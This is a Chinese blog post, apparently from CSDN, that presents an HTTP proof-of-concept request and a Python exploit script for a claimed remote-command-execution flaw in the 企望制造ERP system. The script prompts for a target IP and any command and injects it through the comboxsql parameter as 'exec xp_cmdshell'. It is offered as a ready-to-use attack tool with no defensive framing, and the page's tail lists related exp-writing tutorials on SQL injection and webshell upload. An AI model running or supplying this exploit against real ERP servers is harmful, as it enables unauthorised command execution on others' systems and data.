记一次使用python编写exp

已于 2024-10-01 10:34:23 修改
阅读量83 收藏
点赞数
文章标签: python 开发语言
于 2024-10-01 10:33:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142668525
版权

使用的漏洞是企望制造ERP系统 RCE漏洞

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

python模块

这些是比较常用的

requests
sys
os

这个POC比较简单,直接post发包执行命令就行

python源码

import requests  
  
banner = """\033[34m
 +--^----------,--------,-----,--------^-,
 | |||||||||   `--------'     |          O
 `+---------------------------^----------|
   `\_,---------,---------,--------------'
     / XXXXXX /'|       /'
    / XXXXXX /  `\    /'
   / XXXXXX /`-------'
  / XXXXXX /
 / XXXXXX /
(________(                
 `------' \033[0m             银色子弹Admin
"""

print(banner)
IP = input("\033[91m请输入目标IP:\033[0m")
url = IP + "mainFunctions/comboxstore.action"  
  
# 这里不用编码
RCE = input("\033[91m请输入要执行的命令:\033[0m")
payload = {  
    'comboxsql': "exec xp_cmdshell '%s'" % RCE
}  
  
headers = {  
    'Cache-Control': 'max-age=0',  
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0',  
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',  
    'Accept-Encoding': 'gzip, deflate, br',  
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',  
    'Cookie': 'JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F',  
    'Connection': 'keep-alive',  
    'Content-Type': 'application/x-www-form-urlencoded'  

}  
  
 
response = requests.post(url, data=payload, headers=headers)  
  
 
print("Status Code:", response.status_code)  
print("Response Text:", response.text)  
  
# 如果响应是JSON格式,可以尝试解析并打印  
try:  
    json_response = response.json()  
    print("JSON Response:", json_response)  
except ValueError:  
    # 如果不是JSON格式,则忽略  
    pass

运行效果

马船长
关注
使用python进行sql布尔盲注exp编写
CC210231的博客
04-04 2555
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
python编写poc_分享使用python编写poc,exp的实例教程
weixin_31542609的博客
01-14 1745
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
Python编写EXP
weixin_41489908的博客
08-10 2351
高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。 ---- 网易云热评 一、环境 1、python3 2、用到的模块requests 二、requests模块应用 1、获取网页的内容 # coding=utf-8 import requests res=requests.get("http://192.168.1.129/html/1.html")..
使用python编写简单的文件上传exp
CC210231的博客
04-02 2120
最近开始学习使用python进行exp编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
使用python编写sql时间盲注的exp
CC210231的博客
04-05 1956
前言: 前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。 我们在exp中怎样利用呢? 我们可以获
061 python实现EXP
鸡蛋炒鸡蛋
04-20 5202
文章目录一:概述二:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
python实现定制EXP
weixin_51693574的博客
01-31 970
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
pythonexp_python中的exp是什么
weixin_39758696的博客
01-29 3111
Python exp() 函数描述exp() 函数返回 x 的指数,。语法importmathmath.exp(x)注意:exp() 是不能直接访问的,需导入 math 模块,通过静态对象调用该方法。参数x -- 数值表达式。返回值返回 x 的指数,。实例#-*-coding:UTF-8-*-importmath#导入math模块print"math.exp(2):"...
【CyberSecurityLearning 68】python 编写exp
_Co1a
04-15 478
目录 python 编写exppython脚本实现布尔盲注 用python脚本实现延时注入 文件上传 python 编写exp exp:漏洞利用工具 以Web 漏洞为主 要求: 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境:python3 核心模块:requests requests模块介绍详细请看:https://blog.csdn.net/Waffle666/article/details/115720052 定制头部 重新定义User-Agen.
python怎么算二元一次方程_使用 Python 解数学方程
weixin_39621488的博客
11-25 1492
说到数学题,相信大家都不陌生,从小学到大学都跟数学打交道。 其中初中的方程组,高中的二次曲线,大学的微积分最为头疼,这个项目就使用python 来解决方程组问题,微积分问题,矩阵化简。SymPy库用Python解决方程组、微积分等问题,主要是用到Python的一个库——SymPy库。可以说这个项目也主要是学习SymPy库的用法。SymPy是符号数学的Python库。它的目标是成为一个全功能的计算机...
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+...
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 686
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
2301_78772942的博客
09-27 700
第二百五十四节 JPA教程 - JPA 多对多映射示例
python中的深浅拷贝以及总体框架了解
AgostoDu的博客
09-26 1163
1、当b使用copy.deepcopy()深拷贝的时候,可以理解为b不仅外面的整体开辟了一个新的内存地址,b里面包含的列表也开辟了新的内存地址和a里面的内存地址没有任何关系,所以当a修改里面列表元素的值时不会影响b里面列表元素的值。print(mr) #{'name': 'lis', 'age': 18, 'scroe': 100}<br>备注:已经存在的值的优先级>默认值<br>6.3 直接修改 值,显示最新修改值 (修改默认值优先级小于直接添加的字典值)<br>
Python精选200Tips:171-175
AnFany
09-26 1264
Python深度学习的项目
ubuntu安装libtorch
meng_152634的博客
09-25 751
nouveau是由第三方为NVIDIA显卡开发的一个开源3D驱动,ubuntu默认集成了nouveau驱动,安装NVIDIA驱动前必须禁用系统自带的显卡驱动nouveau,否则安装NVIDIA驱动时会报错。,一定要确定好安装的CUDA版本是否支持显卡的算力,否则安装成功也无法使用GPU加速。如果cmake版本低于3.18,会出现下面的报错,这是由于低于3.18的cmake不支持CUDA17的编译,需要更新cmake版本。因为安装的CUDA版本为12.1,这里选择最新版的CUDNN 9.4.0进行安装。
遥感影像-实例分割数据集:iSAID 从切图到YOLO格式数据集制作详细介绍
GIS潮流
09-30 650
开源数据集isaid标注包含实例分割,但是原始影像太大,很吃显存,一般显卡无法用原始影像直接训练,所以需要对影像进行裁剪,并生成对应的标签,因为想用yolo系列跑模型,所以将标签需要转为txt格式。
酷炫音乐盒: 使用Python和Tkinter配合Pygame打造自己的音乐播放器
宇宙第一小趴菜的博客
09-29 1019
Tkinter是一个功能强大且简单易用的库,适合构建轻量级的GUI应用程序。它在不同的操作系统上具有相同的外观和行为,因此可以实现跨平台的应用程序。当然,Tkinter还有更多的功能和细节,通过阅读官方文档和教程,你可以更深入地了解和学习如何运用Tkinter来创建各种GUI应用程序。
合并两个有序数组
最新发布
Sudo_Wang的学习记录
09-30 332
我们可以使用双指针法从后向前遍历,避免将已经排序的数组打乱。这个方法的核心思路是从。的末尾开始填充较大的元素,因为末尾是用零填充的空闲区域,这样我们可以避免覆盖。这个方法能够高效地解决问题,并且符合进阶要求的 O(m + n) 复杂度。
编写代码,使用python编写DFT代码
09-22
### 回答1: 好的,以下是使用Python编写DFT代码的示例: ```python import numpy as np def DFT(x): """ 计算离散傅里叶变换 :param x: 输入信号 :return: 输出离散傅里叶变换 """ N = len(x) X = np.zeros(N, dtype=np.complex) for k in range(N): for n in range(N): X[k] += x[n] * np.exp(-2j * np.pi * k * n / N) return X ``` 上述代码中,我们首先导入了NumPy库,然后定义了一个名为DFT的函数,用于计算离散傅里叶变换。函数接受一个输入信号x,然后使用嵌套循环计算DFT。最后,返回DFT结果X。 注意,在该代码中,我们使用了NumPy中的复数数据类型dtype=np.complex,以处理实部和虚部。同时,我们使用了欧拉公式来计算正弦和余弦函数。 ### 回答2: 使用Python编写离散傅里叶变换(DFT)代码可以通过以下步骤实现: 1. 导入所需的模块:首先,我们需要导入`numpy`库,以便使用其数组操作和数学函数。可以使用以下代码进行导入: ```python import numpy as np ``` 2. 定义DFT函数:创建一个函数来执行离散傅里叶变换。该函数将接受一个输入序列,并返回其频谱。可以使用以下代码定义DFT函数: ```python def dft(x): N = len(x) n = np.arange(N) k = n.reshape((N, 1)) e = np.exp(-2j * np.pi * k * n / N) X = np.dot(e, x) return X ``` 3. 测试代码:将输入序列传递给DFT函数并打印输出结果。可以使用以下代码进行测试: ```python if __name__ == "__main__": x = np.array([1, 2, 3, 4]) X = dft(x) print(X) ``` 以上代码将输出输入序列的DFT结果。 这就是使用Python编写DFT代码的步骤。该代码将给定序列转换为其频谱。使用这个代码,你可以输入不同的序列并观察它们的频谱。 ### 回答3: 离散傅里叶变换(Discrete Fourier Transform,DFT)是将离散时间序列(或空间序列)转换为频域序列的一种数学变换方法。下面是用Python编写DFT的代码示例。 ```python import numpy as np def dft(x): N = len(x) X = np.zeros(N, dtype=np.complex) for k in range(N): for n in range(N): X[k] += x[n] * np.exp(-2j*np.pi*k*n/N) return X # 测试代码 x = np.array([1, 2, 3, 4]) X = dft(x) print(X) ``` 以上代码中,`dft`函数接受一个长度为N的离散时间序列`x`作为输入,并返回一个大小为N的复数数组`X`作为输出。通过两个嵌套的for循环,对每个频域指数k循环迭代,对于每个k值,对时间序列x中的每个样本值n进行迭代。在内循环中,通过将时间序列x的每个样本值乘以一个复数指数,然后累加得到频率域序列X中的每个样本值。 以上是一个简单的DFT实现,但实际使用中可能会使用更高效的算法,如Fast Fourier Transform(快速傅里叶变换,FFT)。FFT是DFT的快速实现,能够显著提高计算效率,并且在大多数实际应用中更加常用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值